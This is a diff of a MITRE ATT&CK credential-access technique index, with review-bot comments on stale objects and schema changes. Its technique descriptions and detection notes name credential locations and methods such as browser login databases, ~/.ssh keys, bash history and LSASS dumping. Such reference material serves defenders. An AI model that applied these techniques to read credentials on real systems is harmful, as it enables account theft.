- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -45520,55 +46291,10 @@ credential-access:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ryan Benson, Exabeam
- - Barry Shteiman, Exabeam
- - Sylvain Gil, Exabeam
- - RedHuntLabs, @redhuntlabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
- type: attack-pattern
- created: '2020-02-12T18:57:36.041Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1555.003
- url: https://attack.mitre.org/techniques/T1555/003
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Microsoft CryptUnprotectData April 2018
- url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
- description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
- June 18, 2019.
- - source_name: Proofpoint Vega Credential Stealer May 2018
- url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
- description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
- in targeted campaign . Retrieved June 18, 2019.
- - source_name: FireEye HawkEye Malware July 2017
- url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
- description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
- Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
- 2019.
- - source_name: GitHub Mimikittenz July 2016
- url: https://github.com/putterpanda/mimikittenz
- description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
- Retrieved June 20, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-15T14:13:45.294Z'
name: 'Credentials from Password Stores: Credentials from Web Browsers'
description: "Adversaries may acquire credentials from web browsers by reading
files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
@@ -45598,6 +46324,12 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ryan Benson, Exabeam
+ - Barry Shteiman, Exabeam
+ - Sylvain Gil, Exabeam
+ - RedHuntLabs, @redhuntlabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Identify web browser files that contain credentials such
as Google Chrome’s Login Data database file: AppData\Local\Google\Chrome\User
Data\Default\Login Data
. Monitor file read events of web browser files
@@ -45607,23 +46339,58 @@ credential-access:
reading web browser process memory, utilizing regular expressions, and those
that contain numerous keywords for common web applications (Gmail, Twitter,
Office365, etc.).'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Access'
- 'File: File Access'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+ created: '2020-02-12T18:57:36.041Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/003
+ external_id: T1555.003
+ - source_name: GitHub Mimikittenz July 2016
+ description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+ Retrieved June 20, 2019.
+ url: https://github.com/putterpanda/mimikittenz
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Microsoft CryptUnprotectData April 2018
+ description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+ June 18, 2019.
+ url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+ - source_name: Proofpoint Vega Credential Stealer May 2018
+ description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+ in targeted campaign . Retrieved June 18, 2019.
+ url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+ - source_name: FireEye HawkEye Malware July 2017
+ description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+ Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+ 2019.
+ url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1555.003
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
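Review bot: `x_mitre_permissions_required: - User` is removed from T1555.003 (and later from T1552.003) as part of moving the object to attack spec 3.2.0, which retired that field upstream; if anything in this repository still reads `x_mitre_permissions_required` (for example an index column or a filter on required privilege), it will now see the key only on the few techniques that were not regenerated from a current object. Suggest grepping the generator and index code for the field name before merging, and otherwise this hunk is a pure reordering of the reference entries with no content change.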
@@ -45660,23 +46427,23 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -45709,21 +46476,20 @@ credential-access:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.004:
technique:
- modified: '2023-04-12T23:52:08.194Z'
+ modified: '2024-10-04T11:31:56.622Z'
name: 'Unsecured Credentials: Private Keys'
description: "Adversaries may search for private key certificate files on compromised
systems for insecurely stored credentials. Private cryptographic keys and
@@ -45734,7 +46500,7 @@ credential-access:
as ~/.ssh
for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\
on Windows. Adversary tools may also search compromised systems for file extensions
relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
- Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+ Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
device key and a transport key are generated and used to verify the device’s
identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -45768,7 +46534,7 @@ credential-access:
- macOS
- Windows
- Network
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
@@ -45796,7 +46562,7 @@ credential-access:
- source_name: Kaspersky Careto
description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
Masked APT. Retrieved July 5, 2017.
- url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+ url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
- source_name: Microsoft Primary Refresh Token
description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
Retrieved February 21, 2023.
@@ -45807,14 +46573,13 @@ credential-access:
url: https://en.wikipedia.org/wiki/Public-key_cryptography
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.004
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
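Review bot: the `modified` timestamp for T1557.001 moves backwards, from `2023-04-25T14:00:00.188Z` to `2022-10-25T15:46:55.393Z`, and its `x_mitre_attack_spec_version` stays at 3.0.0 while every other technique touched by this diff advances to a 2024 timestamp and 3.2.0. That pattern suggests the generator resolved this technique to an older STIX object (for example a superseded revision present in the bundle) rather than the current one. Suggest checking the lookup for T1557.001, picking the object with the newest `modified` when several share an `external_id`, and regenerating before merging.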
@@ -45922,12 +46687,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1003.001:
technique:
- modified: '2023-12-27T17:57:20.003Z'
+ modified: '2024-08-13T13:52:45.379Z'
name: 'OS Credential Dumping: LSASS Memory'
description: |
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -45964,6 +46728,7 @@ credential-access:
- Edward Millington
- Ed Williams, Trustwave, SpiderLabs
- Olaf Hartong, Falcon Force
+ - Michael Forret, Quorum Cyber
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -45976,7 +46741,7 @@ credential-access:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Access'
- 'Windows Registry: Windows Registry Key Modification'
@@ -46026,12 +46791,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.001
atomic_tests: []
T1110.003:
technique:
- modified: '2024-03-07T14:33:34.201Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Spraying'
description: |-
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -46057,6 +46821,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- John Strand
@@ -46072,18 +46837,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -46110,14 +46875,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.003
atomic_tests: []
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -46128,13 +46890,13 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -46148,6 +46910,7 @@ credential-access:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -46158,12 +46921,12 @@ credential-access:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1003.005:
technique:
- modified: '2024-04-18T23:47:54.553Z'
+ modified: '2024-10-15T14:18:59.123Z'
name: 'OS Credential Dumping: Cached Domain Credentials'
description: "Adversaries may attempt to access cached domain credentials used
to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -46238,7 +47001,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.005
atomic_tests: []
T1558.001:
@@ -46284,7 +47046,7 @@ credential-access:
url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
Retrieved February 27, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-05T16:07:03.779Z'
name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
description: "Adversaries who have the KRBTGT account password hash may forge
Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
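Review bot: the `modified` timestamp for T1558.001 (Golden Ticket) regresses from `2022-04-25T14:00:00.188Z` to `2020-11-05T16:07:03.779Z`, which is earlier than anything else in this diff and older than the object it replaces. Combined with the reference entries above keeping the older `url:` before `description:` key order that the other regenerated techniques no longer use, this looks like the generator pulled a stale object for this technique. Please verify the source object for T1558.001 and regenerate; a `modified` value that moves backwards should probably fail the generator's sanity check rather than land in the index.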
@@ -46319,16 +47081,14 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.001
atomic_tests: []
T1649:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal or Forge Authentication Certificates
description: |-
- Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+ Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
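Review bot: for T1558.001 this hunk removes `x_mitre_attack_spec_version: 2.1.0` together with `spec_version` but adds no replacement, so after this change T1558.001 is the only technique in the section with no `x_mitre_attack_spec_version` at all, while it still carries `x_mitre_permissions_required: - User`, a field the other regenerated techniques have dropped. Both are consistent with the object having been sourced from an old revision; suggest regenerating this entry from the current object so it carries `x_mitre_attack_spec_version: 3.2.0` like its neighbours. The T1649 description change in the same hunk (Azure AD to Entra ID) is the expected upstream rename and needs nothing further.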
@@ -46338,21 +47098,23 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Tristan Bennett, Seamless Intelligence
+ - Lee Christensen, SpecterOps
+ - Thirumalai Natarajan, Mandiant
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- - Azure AD
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Tristan Bennett, Seamless Intelligence
- - Lee Christensen, SpecterOps
- - Thirumalai Natarajan, Mandiant
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -46401,33 +47163,11 @@ credential-access:
url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1649
atomic_tests: []
T1552.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
- type: attack-pattern
- created: '2020-02-04T13:02:11.685Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.003
- url: https://attack.mitre.org/techniques/T1552/003
- - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- source_name: External to DA, the OS X Way
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:24:04.912Z'
name: 'Unsecured Credentials: Bash History'
description: 'Adversaries may search the bash command history on compromised
systems for insecurely stored credentials. Bash keeps track of the commands
@@ -46442,25 +47182,43 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Monitoring when the user's .bash_history
is
read can help alert to suspicious activity. While users do typically rely
on their history of commands, they often access this history through other
utilities like "history" instead of commands like cat ~/.bash_history
.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+ created: '2020-02-04T13:02:11.685Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/003
+ external_id: T1552.003
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.003
atomic_tests: []
T1552.001:
technique:
- modified: '2024-04-15T21:33:00.213Z'
+ modified: '2024-10-15T14:28:43.639Z'
name: 'Unsecured Credentials: Credentials In Files'
description: |-
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
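Review bot: `x_mitre_permissions_required: - User` is removed from T1552.003 and not re-added anywhere in the hunk, and `x_mitre_attack_spec_version` jumps from 2.1.0 to 3.2.0 with `revoked: false` added. The field drop is consistent with the other objects in this change, which no longer carry it, but any downstream consumer that filters techniques by required privilege should be checked before merge. The `x_mitre_detection` context lines with `is` and `.` split onto their own lines are pre-existing YAML wrapping and are not touched by this change.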
@@ -46534,7 +47292,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.001
atomic_tests: []
T1606.001:
@@ -46596,11 +47353,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1528:
technique:
- modified: '2024-03-24T19:41:54.832Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Application Access Token
description: "Adversaries can steal application access tokens as a means of
acquiring credentials to access remote systems and resources.\n\nApplication
@@ -46649,6 +47405,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Shailesh Tiwary (Indian Army)
@@ -46657,6 +47414,7 @@ credential-access:
- Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- Ram Pliskin, Microsoft Azure Security Center
- Jack Burns, HubSpot
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -46667,13 +47425,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- - Office 365
- - Azure AD
- - Google Workspace
- Containers
- x_mitre_version: '1.3'
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
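Review bot: the T1528 platform list swaps `Office 365`, `Azure AD` and `Google Workspace` for `Office Suite` and `Identity Provider` and adds `IaaS`, with the version bumped to `'1.4'`. Since the old platform names no longer appear in the technique object, any per-platform index in this repository keyed on those names will no longer pick up T1528; confirm those indexes are regenerated (or retired) in the same change so the new platform names and the old ones do not drift apart.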
@@ -46729,9 +47488,6 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1528
atomic_tests:
- name: Azure - Dump All Azure Key Vaults with Microburst
@@ -46805,37 +47561,7 @@ credential-access:
elevation_required: true
T1552.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
- type: attack-pattern
- created: '2020-02-11T18:43:06.253Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.006
- url: https://attack.mitre.org/techniques/T1552/006
- - source_name: Microsoft GPP 2016
- url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
- description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
- March 9, 2020.
- - url: https://msdn.microsoft.com/library/cc422924.aspx
- description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
- 11, 2018.
- source_name: Microsoft GPP Key
- - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
- description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
- Retrieved April 11, 2018.
- source_name: Obscuresecurity Get-GPPPassword
- - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
- & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
- url: https://adsecurity.org/?p=2288
- source_name: ADSecurity Finding Passwords in SYSVOL
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-08-15T13:21:22.734Z'
name: 'Unsecured Credentials: Group Policy Preferences'
description: |
